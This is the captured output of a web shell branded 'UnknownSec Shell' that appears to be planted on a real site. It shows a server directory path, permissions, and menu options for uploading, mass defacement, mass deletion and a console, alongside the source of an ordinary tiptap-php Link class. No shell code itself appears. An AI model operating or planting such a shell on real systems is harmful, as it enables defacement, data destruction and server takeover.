shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
ueberdosis
/
tiptap-php
/
src
/
Marks
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Link.php
<?php namespace Tiptap\Marks; use Tiptap\Core\Mark; use Tiptap\Utils\HTML; class Link extends Mark { public static $name = 'link'; public function addOptions() { return [ 'HTMLAttributes' => [ 'target' => '_blank', 'rel' => 'noopener noreferrer nofollow', ], ]; } public function parseHTML() { return [ [ 'tag' => 'a[href]', ], ]; } public function addAttributes() { return [ 'href' => [], 'target' => [], 'rel' => [], ]; } public function renderHTML($mark, $HTMLAttributes = []) { return [ 'a', HTML::mergeAttributes($this->options['HTMLAttributes'], $HTMLAttributes), 0, ]; } }
© 2026 UnknownSec